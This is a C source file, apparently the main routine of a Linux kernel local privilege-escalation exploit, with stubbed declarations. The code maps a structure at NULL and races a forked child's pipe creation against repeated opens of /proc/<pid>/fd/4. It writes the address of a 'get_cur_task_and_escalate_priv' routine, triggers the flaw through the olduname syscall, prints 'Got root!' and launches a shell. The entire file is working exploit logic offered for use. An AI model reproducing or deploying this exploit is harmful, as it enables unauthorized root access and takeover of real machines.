
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int O_RDWR ;
 int __NR_olduname ;
 int close (int) ;
 int fork () ;
 scalar_t__ get_cur_task_and_escalate_priv ;
 int getgid () ;
 int getuid () ;
 int gid ;
 int gomu_gomu_nooooo_gatling_shell () ;
 int is_done (int ) ;
 scalar_t__ iz_kern2600_10 ;
 int map_struct_at_null () ;
 int memcpy (char*,char*,int) ;
 int open (char*,int ) ;
 int perror (char*) ;
 int pipe (int*) ;
 int printf (char*) ;
 int setresgid (int ,int ,int ) ;
 int setresuid (int ,int ,int ) ;
 int sprintf (char*,char*,int) ;
 int syscall (int ,int *) ;
 int uid ;
 int write (int,char*,int) ;

int main(int ac, char **av)
{
 int fd[2];
 int pid;
 char tapz[4];


 uid = getuid();
 gid = getgid();
 setresuid(uid, uid, uid);
 setresgid(gid, gid, gid);

 map_struct_at_null();


 {
  pid = fork();
  if (pid == -1)
  {
   perror("fork");
   return (-1);
  }
  if (pid)
  {
   char path[1024];

   sprintf(path, "/proc/%d/fd/4", pid);
   while (!is_done(0))
   {
    fd[0] = open(path, O_RDWR);
    if (fd[0] != -1)
    {
     if(iz_kern2600_10)
                              {
                                    memcpy(tapz, (char *)get_cur_task_and_escalate_priv, sizeof(int));
                                    write(fd[0], tapz, 4);
                              }
     close(fd[0]);
    }
   }
   if(iz_kern2600_10)
                  {
                        syscall(__NR_olduname, ((void*)0));
                  }
                  printf("\t\t+ Got root!\n");
   gomu_gomu_nooooo_gatling_shell();
   return (0);
  }

  while (!is_done(0))
  {
   if (pipe(fd) != -1)
   {
    close(fd[0]);
    close(fd[1]);
   }
  }
 }
}
